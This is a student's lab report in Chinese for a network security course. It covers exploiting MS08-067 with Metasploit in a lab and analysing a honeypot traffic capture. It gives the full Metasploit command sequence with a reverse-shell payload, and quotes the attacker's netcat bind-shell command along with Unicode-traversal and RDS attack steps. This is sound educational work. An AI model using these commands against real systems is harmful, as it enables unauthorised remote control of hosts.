20252806 2025-2026-2 《网络攻防实践》第六周作业

20252806 2025-2026-2 《网络攻防实践》第六周作业

1 实验内容

1.1 实验要求

1）动手实践Metasploit windows attacker

任务：使用metasploit软件进行windows远程渗透统计实验

具体任务内容：使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击，获取目标主机的访问权

（2）取证分析实践：解码一次成功的NT系统破解攻击。

来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net)，要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么

（3）团队对抗实践：windows系统远程渗透攻击和分析。

攻方使用metasploit选择漏洞进行攻击，获得控制权。（要求写出攻击方的同学信息、使用漏洞、相关IP地址等）

防守方使用wireshark监听获得的网络数据包，分析攻击过程，获取相关信息。

1.2 知识点总结与梳理

1. 网络安全基础
   渗透测试：在授权环境下模拟黑客攻击，发现系统漏洞并提出加固方案。
   远程代码执行（RCE）：攻击者通过漏洞在目标主机上直接执行系统命令，获取控制权。
   缓冲区溢出：向程序输入超出其处理能力的数据，覆盖内存关键区域，实现劫持程序流程。
2. Windows 常见高危漏洞原理
   MS08-067：Windows SMB 服务远程代码执行漏洞，利用 445 端口，无需认证即可远程控制。
   MS06-040：Windows SMB 协议漏洞，同样可导致远程代码执行，影响早期 Windows 版本。
   IIS 目录穿越 / Unicode 漏洞：通过构造特殊路径，越权读取系统敏感文件。
   msadcs.dll 命令执行漏洞：早期 IIS 组件漏洞，可通过构造恶意请求执行系统命令。
3. Metasploit 框架基础
   Exploit（漏洞利用模块）：触发漏洞的代码。
   Payload（攻击载荷）：漏洞触发后执行的恶意代码，如反弹 Shell、添加用户、上传文件等。
   Meterpreter / Shell：获取目标主机交互权限的控制通道。
   常用命令：
   msfconsole：启动框架
   search：搜索漏洞模块
   use：加载模块
   set RHOST/LHOST：设置目标 / 攻击机 IP
   exploit：发起攻击
4. 流量分析与取证基础
   Wireshark：抓包与协议分析工具，可追踪 TCP 流、查看攻击报文。
   蜜罐（Honeypot）：故意部署的脆弱系统，用于引诱、记录攻击者行为。
   攻击溯源：通过日志、流量包还原攻击路径、工具、操作步骤。
5. 典型攻击流程
   信息收集 → 漏洞探测 → 漏洞利用 → 获取 Shell → 提权 → 留后门 / 清痕迹

2 实验内容

2.1 动手实践Metasploit windows attacker

查看kali攻击机的IP地址为：192.168.200.4:

首先对靶机进行nmap端口服务扫描

查看Win2k靶机的IP地址为：192.168.200.7

首先在kali打开metasploit，输入命令行msfconsole进入启动msfconsole，回车后就会进入到其控制台界面；

输入命令行search ms08_067查看漏洞ms08_067详细信息，可以看到，这是针对这个漏洞的渗透攻击模块；

输入use windows/smb/ms08_067_netapi进入漏洞所在文件，输入show options查看攻击此漏洞需要的设置；

输入命令行show payloads查看有效的攻击载荷，选择第4个载荷 payload generic/shell_reverse_tcp 进行攻击；

输入命令行 set payload generic/shell_reverse_tcp 设置攻击的载荷为tcp的反向连接；
输入命令行set RHOST 192.168.200.7设置渗透攻击的靶机IP，输入set LHOST 192.168.200.4设置渗透攻击的主机是kali；

输入exploit

进行渗透攻击，出现会话连接即攻击成功；

成功渗透到靶机win2k，输入命令ipconfig查看靶机的网络信息成功

2.2取证分析实践：解码一次成功的NT系统破解攻击

将学习通上下载的文件拷贝到kali虚拟机中

使用wireshark打开刚刚拷贝的文件

使用过滤条件ip.addr == 172.16.1.106 and http过滤数据

找到117行的http数据包，根据数据包中的内容，特殊字符串％C0%AF是/的unicode编码，由此判断攻击者进行了unicode攻击并打开了boot.in文件

继续追踪tcp流发现在146号包中有shell语句和"ADM!ROX!YOUR!WORLD"!，查阅资料知道这是RDS漏洞攻击

追踪数据流，这里表明攻击者利用ftp下载了nc.exe,pdump.exe,samdump.dll这三个文件

打开1233号包，追踪TCP数据流看到cmd1.exe /c nc -l -p 6969 -e cmd1.exe，这表明攻击者连接了6969端口，接下来可以添加条件重点追踪涉及6969端口的TCP流，看看攻击者干了什么

输入过滤条件tcp.port == 6969,追踪数据流可以发现攻击机试图进入靶机但是失败

这里表明攻击者删除了之前通过ftp下载的文件，猜测攻击者想要消除痕迹然后溜走

这里表明攻击者发现了靶机是一台蜜罐主机，并表示echo best honeypot

2.3团队对抗实践：windows系统远程渗透攻击和分析

攻方使用metasploit选择漏洞进行攻击，获得控制权。（要求写出攻击方的同学信息、使用漏洞、相关IP地址等）
防守方使用wireshark监听获得的网络数据包，分析攻击过程，获取相关信息。

攻击机kali ip地址：192.168.31.127（郑守浩）
靶机Win2k ip地址： 192.168.31.116 （时进旭）
按照任务一步骤，攻击靶机

键入如下图命令

可以看到目标机器出现我创建的文件夹。

分析追踪流：

3.学习中遇到的问题及解

问题1：ping不通win2

解决：将win2k连接到Vmnet8，并设置Internet协议（TCP/IP）属性从使用下面IP地址变为自动获取ip地址。

问题2：输入exploit进行渗透攻击失败,

解决：显示端口被占用，换一个

4.实践总结

通过本次系列实验，我对渗透测试框架 Metasploit 形成了系统性的认知与实操能力。本次实验以 Windows 操作系统安全攻防为核心，围绕 Metasploit 远程渗透攻击、NT 系统攻击流量取证分析、攻防团队对抗三大实践任务开展学习，完成了从漏洞利用理论知识到攻防实操落地的完整闭环，彻底打破了以往对 Windows 系统 “默认安全” 的固有认知，对系统漏洞的潜在危害、攻击链路的复杂构成以及攻防一体化的安全防护理念，建立起更加直观且深刻的理解。

Metasploit 作为业内主流的渗透测试工具，集成了大量成熟的漏洞利用模块。借助框架实操，我深入掌握了 MS08-067 漏洞的攻击原理与利用流程，切实感受到自动化渗透测试工具在攻防演练中的核心作用；流量取证分析环节中，我熟练掌握了网络流量溯源、攻击行为还原的关键方法，能够通过解析数据包提取攻击特征，完整还原整体攻击链路；而团队攻防对抗环节，高度模拟了真实网络攻防场景，让我切换攻防双视角看待网络安全博弈，清晰认识到攻击与防御的制衡关系，深刻体会到知己知彼、综合防御在网络安全防护中的重要意义。

本次实验与我而言仅是系统安全攻防学习的开端。后续我将以此为基础，持续深耕网络安全领域，在夯实基础漏洞利用能力的前提下，逐步拓展内网渗透、APT 攻击检测等进阶技术的学习与研究，严守网络安全法律法规，将所学攻防知识合理运用于合规的安全检测与防护工作中，不断提升自身网络安全综合实践能力。